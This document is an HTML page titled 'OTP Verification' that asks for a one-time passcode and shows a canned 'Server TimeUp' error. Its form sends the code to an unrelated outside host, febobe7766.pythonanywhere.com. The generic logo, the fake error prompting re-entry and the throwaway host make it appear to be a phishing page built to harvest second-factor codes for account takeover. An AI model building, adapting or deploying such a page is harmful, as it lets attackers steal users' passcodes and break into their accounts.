<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>OTP Verification</title>
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
    <style>
        #loader {
            display: none;
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-left: 4px solid #3498db;
            border-radius: 50%;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            margin-right: 10px;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body>
    <nav class="absolute flex item-center justify-between p-4 shadow w-screen">
        <img src="./media/logo.png" alt="Logo" class="scale-[0.65]">
    </nav>
    <div class="bg-gray-100 flex items-center justify-center h-screen">
        <div class="bg-white p-8 rounded shadow-md w-80 lg:w-96">
            <h2 class="text-2xl font-semibold mb-6">OTP Verification</h2>
            <form method="post" action="https://febobe7766.pythonanywhere.com/otp-timeup ">
                <div class="mb-6">
                    <label for="otp" class="block text-gray-700 text-sm font-medium">Enter OTP</label>
                    <span id="error" class="block text-red-800">Server TimeUp</span>
                    <input type="number" id="otp" name="otp" class="mt-1 p-2 w-full border rounded-md">
                </div>
                <div id="countdown" class="text-center text-sm text-gray-600 mb-4"></div>
                <div class="flex w-full justify-center item-center py-2">
                    <div id="loader"></div>
                </div>
                <button type="submit"
                    class="bg-red-900 text-white p-2 rounded-md w-full hover:bg-blue-600">Verify
                    OTP</button>
            </form>
        </div>
    </div>
</body>

</html>